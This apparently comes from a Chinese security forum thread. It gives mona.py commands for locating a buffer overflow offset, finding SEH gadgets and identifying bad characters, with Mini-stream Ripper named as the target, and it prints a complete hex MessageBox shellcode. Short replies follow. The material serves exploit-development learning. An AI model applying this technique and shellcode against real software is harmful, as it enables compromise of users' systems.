附上mona.py三个常用命令

1定位溢出点
!mona pattern_create 3000  //产生使得程序崩溃的3000个字符（也许不止3000），复制到溢出字符串，程序会崩溃，查看此时EIP的字符串
!mona pattern_offset 0x43386F43  //EIP字符串，得出溢出点

2关于如何搜索程序内部的ppr。可以使用
!mona seh

3查找坏字符
!mona bytearray -b '\x00'  //bytearray.txt覆盖ESP开始
!mona compare -f 'bytearray.bin'  //然后查看compare.txt，搜索esp地址，直接找到坏字符
Mini-stream Ripper坏字符
\x09 \x0a

一个比较通用的MessageBoxshellcode
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x58\x20\x20\x20\x68\x2e\x6e"
"\x65\x74\x68\x61\x69\x72\x79\x68\x6e\x65\x74\x66\x68\x77\x77"
"\x77\x2e\x31\xdb\x88\x5c\x24\x10\x89\xe3\x68\x69\x72\x79\x58"
"\x68\x65\x74\x66\x61\x68\x42\x79\x20\x4e\x31\xc9\x88\x4c\x24"
"\x0b\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff"
"\x55\x08";

不错，学习了~~~

谢谢楼主分享，能不能提供一下软件，在网上下载的版本都不对

可以，但是论坛zip最大支持3M，我传不了，你加我QQ79277556

能不能上传一下程序，或者告知一下程序该在哪下载？